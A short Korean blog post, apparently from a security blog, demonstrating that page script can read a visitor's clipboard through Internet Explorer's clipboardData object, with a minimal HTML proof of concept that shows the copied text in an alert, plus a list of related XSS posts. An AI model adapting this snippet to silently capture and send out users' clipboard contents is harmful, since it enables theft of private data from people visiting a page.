스크립트로 Clipboard의 내용까지 XSS 할수 있네요.. 
즉 copy+c 로 카피한 내용 부분 까지 악의적인 사용자에게 유출 될수 있다는 얘기죠..--;
 예>
<HTML>
 <HEAD>
  <TITLE> Clipboard XSS </TITLE>
 </HEAD>
 <BODY>
<script>var memo = clipboardData.getData("Text"); 
if (memo!=null) { 
alert(memo);
}
</script>
 </BODY>
</HTML>
악의적인 사용은 사용자 본인에게 책임이 있음을 명시합니다. 
금일도 보안 합시다.
'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글
| XSS-Harvest / xss-harvest.pl (0) | 2011.08.29 | 
|---|---|
| Adobe RoboHelp 9 DOM Cross Site Scripting (0) | 2011.08.16 | 
| Mailto: Crash (may crash you) (0) | 2011.08.08 | 
| XSS BASIC SITE (0) | 2011.08.08 | 
| XSS를 이용한 키로거 (0) | 2010.10.27 | 

 
 





